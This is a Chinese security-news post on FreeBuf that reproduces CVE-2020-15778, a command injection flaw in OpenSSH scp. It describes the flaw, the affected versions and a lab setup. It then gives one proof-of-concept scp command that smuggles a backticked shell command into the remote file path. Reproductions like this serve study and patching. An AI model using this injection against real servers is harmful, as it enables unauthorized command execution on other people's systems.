freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2020-15778 OpenSSH命令注入
2020-10-19 21:40:14

漏洞介绍

SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。
OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾,可以触发命令注入漏洞。
攻击者可以采用反引号(`)文件作为命令注入执行scp命令,命令将会发送到远程服务器并执行。

影响版本
version: <=openssh-8.3p1

复现环境

攻击机:192.168.20.101
靶机:192.168.20.102
利用场景:已知 ssh 密码为 docker

漏洞复现:

scp cve202015778.txt docker@192.168.20.102:'`touch /tmp/cve202015778.sh`tmp'

#touch /tmp/cve202015778.sh`tmp' 单引号包裹全路径信息
#touch /tmp/cve202015778.sh` 反引号包裹要执行的命令
#中途需要身份验证,需要输入对应用户的密码

1603114748_5f8d96fc56dfd73fbf5ee.png!small?1603114750346

靶机查看信息

1603114770_5f8d9712de7500d8fcee0.png!small?1603114772903

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

本文作者:, 转载请注明来自FreeBuf.COM

# 系统安全
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑